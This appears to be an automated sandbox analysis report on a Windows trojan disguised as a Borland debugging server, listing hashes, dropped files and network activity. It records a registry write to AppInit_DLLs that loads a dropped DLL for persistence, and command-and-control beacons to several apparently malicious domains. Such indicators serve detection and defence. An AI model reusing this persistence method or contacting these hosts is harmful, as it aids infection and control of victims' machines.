Analysis Date: 2013-07-23 01:38:43
MD5: 724674e9c7c83d77d6de3d4004363f90
SHA1: 14eaaddfe2b26b2ad6aa07f796badef09e7ae24d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: cbe78a03abdbd8845b3dc09b5fa37819 sha1: 381b620da6eb24d9df58664d40e9bd93415610fa size: 90112
Section _ASM2: md5: 076f230f10037cf1fd4590959af11728 sha1: 9ee6325e5b57750f899b0e3e0935e4b1420047db size: 62464
Section .rdata: md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section .data: md5: 4f0f1c6cb3585963ac2e77e53fd7ec9f sha1: 11892fec92ea8d1796a05d195b14777e53d6e3d1 size: 5120
Section .tls: md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc: md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp: 2012-09-18 19:14:38
Version:
LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas\NoOfOldWorkAreas ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\ProgramsCache ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝ 31
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify\PastIconsStream ➝ NULL
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\vjncpni.dll
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Mutex: Shell.CMruPidlList
Winsock DNS: 91.233.89.106
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: terrans.su
Winsock DNS: nsknock.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: gleospond.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\vjncpni.dll\\x00

Network Details:

DNS: gleospond.com (Type: A) ➝ 91.220.35.154
DNS: getavodes.com (Type: A) ➝ 91.220.35.154
DNS: tryatdns.com (Type: A) ➝ 91.220.35.154
DNS: instrango.com (Type: A) ➝ 62.116.143.13
DNS: netrovad.com (Type: A) ➝ 192.74.240.52
DNS: nsknock.com (Type: A) ➝ 62.116.143.13
DNS: fescheck.com (Type: A)
DNS: terrans.su (Type: A)
DNS: tegimode.com (Type: A)
DNS: denadb.com (Type: A)
DNS: foradns.com (Type: A)
DNS: clickstano.com (Type: A)
DNS: denareclick.com (Type: A)
DNS: clickbeta.ru (Type: A)
DNS: nshouse1.com (Type: A)
DNS: clickclans.ru (Type: A)
HTTP GET: http://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jN3VkYFy+R/X
User-Agent:
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jHutw7EsXn59
User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jCS1jrtODlAL
User-Agent:
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jPh1rvcuvsaB
User-Agent:
HTTP GET: http://netrovad.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jIXNgZIeRTi2
User-Agent:
HTTP GET: http://nsknock.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jCy7MU3v5G/h
User-Agent:
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1436&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg0lj4/84ECwc7ltCW2Hu/B/g7HGMIKa+jJKgo+NkKZki
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 91.220.35.154:80
Flows TCP: 192.168.1.1:1032 ➝ 91.220.35.154:80
Flows TCP: 192.168.1.1:1033 ➝ 91.220.35.154:80
Flows TCP: 192.168.1.1:1034 ➝ 62.116.143.13:80
Flows TCP: 192.168.1.1:1035 ➝ 192.74.240.52:80
Flows TCP: 192.168.1.1:1036 ➝ 62.116.143.13:80
Flows TCP: 192.168.1.1:1037 ➝ 91.233.89.106:80
